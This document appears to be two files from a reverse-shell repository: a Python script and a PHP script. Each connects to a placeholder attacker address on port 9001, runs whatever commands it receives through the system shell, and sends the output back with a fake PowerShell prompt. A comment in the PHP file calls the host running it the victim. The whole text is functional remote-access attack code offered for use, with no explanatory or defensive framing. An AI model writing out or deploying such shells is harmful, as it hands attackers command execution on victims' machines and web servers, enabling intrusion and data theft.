File: Clasic_Rever_Shell/Python/Clasic3.py
# windows (Linux/macOS)
import socket
import subprocess
import os
import sys

def main():
    host = 'IP_ADDRESS'
    port = 9001
    
    try:
        # Create TCP socket and connect
        client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client.connect((host, port))
        
        while True:
            # Receive data from the server
            data = client.recv(65536)
            if not data:
                break
            
            # Decode the command
            command = data.decode('ascii').strip()
            
            # Execute the command
            try:
                # Execute command and capture output
                result = subprocess.run(
                    command, 
                    shell=True, 
                    capture_output=True, 
                    text=True,
                    timeout=30
                )
                
                # Combine stdout and stderr
                output = result.stdout
                if result.stderr:
                    output += result.stderr
                
                # Add current directory prompt
                current_dir = os.getcwd()
                sendback = output + '\nPS ' + current_dir + '> '
                
            except subprocess.TimeoutExpired:
                sendback = "Error: Command timed out\nPS " + os.getcwd() + '> '
            except Exception as e:
                sendback = f"Error: {str(e)}\nPS " + os.getcwd() + '> '
            
            # Send response back
            client.send(sendback.encode('ascii'))
            
    except Exception as e:
        print(f"Connection error: {e}")
    finally:
        try:
            client.close()
        except:
            pass

if __name__ == "__main__":
    main()

File: Clasic_Rever_Shell/PHP/Clasic3.php
<?php
// // El servidor donde se ejecuta (la víctima principal)
$host = 'IP_ADDRESS';
$port = 9001;

try {
    // Create TCP socket and connect
    $client = socket_create(AF_INET, SOCK_STREAM, 0);
    socket_connect($client, $host, $port);

    while (true) {
        // Receive data from the server
        $data = socket_read($client, 65536);
        if (!$data) {
            break;
        }

        // Decode the command
        $command = trim(utf8_decode($data));

        // Execute the command
        try {
            // Execute command and capture output
            $result = shell_exec($command);

            // Add current directory prompt
            $current_dir = getcwd();
            $sendback = $result . "\nPS " . $current_dir . "> ";
        } catch (Exception $e) {
            $sendback = "Error: " . $e->getMessage() . "\nPS " . getcwd() . "> ";
        }

        // Send response back
        socket_write($client, $sendback, strlen($sendback));
    }
} catch (Exception $e) {
    echo "Connection error: " . $e->getMessage();
} finally {
    try {
        socket_close($client);
    } catch (Exception $e) {
        // Do nothing
    }
}